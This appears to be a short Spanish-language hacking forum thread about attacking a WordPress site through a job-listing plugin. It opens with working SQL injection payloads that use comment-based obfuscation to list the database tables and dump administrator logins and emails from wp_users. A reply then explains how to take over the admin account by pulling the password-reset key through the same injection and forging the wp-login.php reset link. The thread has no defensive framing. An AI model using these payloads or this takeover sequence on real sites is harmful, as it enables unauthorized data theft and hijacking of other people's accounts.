urldelaweb.com/career'details/?jobid=-1+/*!UNION*/+/*!SELECT*/+1,2,3,4--
+/*!UNION*/+/*!SELECT*/+1,replace(group_concat(table_name),0x2c,0x3c62723e),3,4+from+information_schema.tables--
+/*!UNION*/+/*!SELECT*/+1,concat(user_login,0x3d,user_email),3,4+from+wp_users--
Buen topic, seria bueno que agregues el plugin y/o la version de Wordpress vulnerable.PD: quita el email que se ve en la ultima imagen por favor.
Es sencillo, cojemos el email del administrador, ejemplo: [email protected], vamos al panel wordpress que por default es web/wp-admin, clickamos en "Forgot your password?" y insertamos el email, volvemos a nuestro ataque de inyeccion sql y extraemos los datos de la columna, "user_activation_key", nos saldrá un código key, el cual insertaremos en esta sentencia donde dice "aquí": wp-login.php?action=rp&key=aquí&login=y aqui el nombre del usuario administrador. Lo pegamos despues del url de la web quedando así: web/wp-login.php?action=rp&key=codigo&login=admin y ponemos la password que queramos, y quedará la pass reseteada suerte bro